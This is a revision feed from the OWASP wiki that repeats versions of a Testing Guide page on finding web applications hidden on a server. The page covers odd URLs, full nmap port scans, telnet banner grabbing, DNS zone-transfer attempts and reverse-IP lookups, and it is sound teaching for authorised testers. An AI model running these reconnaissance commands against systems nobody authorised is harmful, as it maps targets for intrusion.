To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.10.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that in fact it is an HTTP server. Alternatively,we could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimick HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers)&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Example: identifying www.owasp.org name servers by using host&lt;br /&gt;
&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers&lt;br /&gt;
&lt;br /&gt;
$ host -l www.owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host www.owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
-bash-2.05b$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following example shows the result of a query to one of the above reverse IP services to 216.48.3.18, the IP address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address have been revealed.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs. &amp;lt;br&amp;gt;&lt;br /&gt;
For instance, considering the previous example regarding ''www.owasp.org'', you could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of ''webgoat.org'', ''webscarab.com'', ''webscarab.net''.&amp;lt;br&amp;gt;&lt;br /&gt;
Googling techniques are explained in [[Spidering and googling AoC]].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same listed in Black Box testing no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12425</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12425"/>
				<updated>2006-11-13T08:03:28Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is, the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.10.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that in fact it is an HTTP server. Alternatively,we could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimick HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers)&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Example: identifying www.owasp.org name servers by using host&lt;br /&gt;
&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
